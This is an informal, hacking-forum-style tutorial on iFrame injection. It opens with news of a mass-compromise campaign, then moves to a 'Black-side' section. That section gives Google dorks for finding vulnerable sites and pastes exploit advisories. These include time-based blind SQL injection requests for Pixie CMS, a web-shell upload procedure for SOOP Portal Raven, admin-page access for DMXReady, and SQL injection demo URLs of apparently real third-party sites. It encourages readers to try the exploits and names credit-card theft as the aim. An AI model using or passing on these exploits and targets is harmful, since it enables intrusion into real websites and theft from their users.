The recently discovered iFrame injection campaign rages

on, as the number of compromised web pages goes from

90,000+ to over three million.

Armorize researchers have been keeping an eye on the
unfolding situation and point out that the attackers are
taking advantage of a number of vulnerabilities in the Open
Source online shop e-commerce solution osCommerce.

The injected iFrames point to the willysy.com and exero.eu
domains and through a series of redirections and JavaScript
loadings of additional iFrames takes the user to a page one
the arhyv.ru domain where a number of exploits try to take
advantage of a handful of vulnerabilities in the user's
browser.




So guys what is iFrame injection???
letz start....




Iframe Injection is the redirection to malware containing
site Using IFrame tag. The Attackers injects the malware
contain website(links) using Cross site Scripting in popular
websites. So if the usual visitors of that popular sites opens
the website, it will redirect to malware contain website.
Malware will be loaded to your computer.
Now a days the Internet-Hoppers face these problems in
their absecnce mind,they did not know that his/her system
infected with some malware,virus,trojan,worm etc....


(a practicle experience of mine
sometimes when i download some private "black tool" from
a forum it says that you have to download a downloader and
then it will automatically download your desire file.
I download some file like that but after downloading i
annalyse that program -downloader it contains trojan that
open some ports to build a way to attacker to compromise
your system but thanx to my AV :P)


But now a days our browsers are too smart , they will not
pop up to auto download a program(but be careful about
your downloader e,g IDM,DAP etc).


What is <Iframe> TAG
The <Iframe> Tag is a HTML tag used to seamlessly embed
content from another page or site to build online application.
Here 'i' refers to invisible i,e. <iframe> is "invisible frame"








As we started with an intro about Iframe Injection what an
attacker do with this attack and why.
As guys you aware that now a days CC is the fashion of
every hacker :P
Attackers main target is some on line shopping center site
and got some CC info with that.
as we discuss at first with an incident with willysy.
The initial malicious destination URL in the willysy infection
chain has been changed because it has since been blocked.
It is now the same as that for the exero one:
musicyo.ru/d.php?[REMOVED].
As the detection of this attack is very low(11.6%) on virus
total

So we know something about Iframe injection but how to
perform an attack??
so Letz begin......
Black-side of Iframe Injection
so first of all we have to find some vulnerable site using
Google dorks.
here i will give you some example with dorks..
AngelParrot/i4Style Web Design SQL Injection/ Cross Site
Scripting
Paulo Santos/CGI Helper 1.00 Cross Site Scripting

Piranha/Pixie CMS 1.o1 - 1.04 Blind SQL Injection
Exploit Title: Pixie CMS 1.01 - 1.04 "pixie_user" Blind SQL
Injection
Google Dork: None
Date: 11/14/2011
Author: Piranha, piranha[at]torontomail.com
Software Link: http://www.getpixie.co.uk/
Version: 1.01 - 1.04
Tested on: Windows XP SP3, Pixie versions: 1.01 - 1.04
CVE : None

Example request:
GET
http://localhost:8080/pixie_v1.04/?pixie_user=x',log_importan
t=IF({CONDITION},SLEEP(5),NULL),log_id='1234
Host: localhost:8080
Referer: http://www.google.com/
Pragma: no-cache
Cache-Control: no-cache
Connection: Keep-Alive

If the condition is true then you have a response with
timeout ~5 seconds. Notice that referer is required.

Exploit Title: Pixie CMS 1.01 - 1.04 "Referer" Blind SQL
Injection
Google Dork: None
Date: 11/14/2011
Author: Piranha
Software Link: http://www.getpixie.co.uk/
Version: 1.01 - 1.04
Tested on: Windows XP SP3, Pixie versions: 1.01 - 1.04
CVE : None

Example request:
GET http://localhost:8080/pixie_v1.04/
Host: localhost:8080
Referer:
http://www.google.com',log_important=IF({CONDITION},SLEE
P(5),NULL),log_id='1234
Pragma: no-cache
Cache-Control: no-cache
Connection: Keep-Alive

If the condition is true then you have a response with
timeout ~5 seconds.

Sun Army/SOOP Portal Raven 1.0b Shell Upload Vulnerablity
# Exploit Title: SOOP Portal Raven 1.0b Remote Upload Shell
Vulnerability
# Google Dork: "Powered by SOOP Portal Raven 1.0b"
# Date: 06-12-2010
# Author: Sun Army
# Version: Raven 1.0b
# Tested on: Win 2003

nGa Sa Lu/MG for Media Solution
==================================================
=============
# Exploit Title : MG for media solutions SQL inj: vulnerable
# Google Dork : intext:"Powered by MG for media
solutions
# Date : 27-10-2011
# Author : nGa Sa Lu [ GaNgst3r ]
# Service Provider : http://www.mg-me.com/ourservices
# Tested on : Vista
# Platform : php
==================================================
==============

[+] Google Dork :
intext:"Powered by MG for media solutions

[+] SQL Error Statement :
You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the right
syntax to use near ''1''' at line 1

[+] Demo :
http://www.apex-sy.com/index.php?inid=4&amp;pid=[SQL]
http://hekmahospital.com/index.php?inid=1&amp;id=[SQL]
MG for media solutions suffers from a remote SQL Injection
Vulnerability

nGa Sa Lu/Debliteck Ltd SQL Injection
==================================================
=============
# Exploit Title : Debliteck Ltd SQL inj: vulnerable
# Google Dork : "Designed and Developed by Debliteck
Ltd"
# Date : 17-11-2011
# Author : nGa Sa Lu [ GaNgst3r ]
# Service Provider : http://www.debliteck.com/main.php
# Tested on : Vista
# Platform : php
==================================================
==============

[+] Google Dork :
"Designed and Developed by Debliteck Ltd"

[+] SQL Error Statement :
Warning: mysql_num_rows(): supplied argument is not a
valid MySQL result resource in
/home/l/i/limelight/public_html/article.php on line 19
Wrong article id 66\'at line 1

[+] http://www.localhost.com/article.php?id=[SQL]

[+] Demo :
http://www.limelighttaverna.com/article.php?id=66 [SQL]
http://www.tuckinncy.com/article.php?id=88 [SQL]


##################### Exploit ###################
#
# 1.Register On Site
#
# 2.Shell Renamed to .asp.jpg ( shell.asp.jpg )
#
# 3.Go This Page --> http://site/forum/register.asp?fpn=2
#
# 4. Brows And Upload SHell
#
# 5. go http://site/forum/register.asp?fpn=2 --> List
Avatars --> Your
Personal
# Avatar --> select your Shell and View shell Address
in text box
#
#
# Google Dork : ""Powered by SOOP Portal Raven 1.0b"
#

ajann/DMXReady Document Library Manager<=1.1 contents
change Vulnerabilty
************************************************************
*******************
# Title : DMXReady Document Library Manager <= 1.1
Remote Contents Change Vulnerability
# Author : "ajann" from Turkey
# Contact : :(
# S.Page : http://www.dmxready.com
# $$ : 39.97 $
# Dork : inurl:inc_documentlibrarymanager.asp
# DorkEx :
http://www.google.com.tr/search?hl=tr&q=inurl%3Ainc_docu
mentlibrarymanager.asp&btnG=Google%27da+Ara&meta=



************************************************************
*******************

Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload

#
http://[target]/[path]/admin/DocumentLibraryManager/add_cat
egory.asp

Example:
You Find ->
http://[target]/[path]//applications/DocumentLibraryManager/i
nc_documentlibrarymanager.asp
Edit ->
http://[target]/[path]//admin/DocumentLibraryManager/add_ca
tegory.asp

So guys with these example you can try a little..:P
but careful about ..??
these exploit have updated you can check those useing
Google.

So fellus we talking about attack but we have to care
ourselves with a cure...
What should we do if we infected via Iframe injection???
Most of we use FileZilla/XAMP to host a local Site to
connect FTP server
then we must change our password os FTPs,control-
panel and database.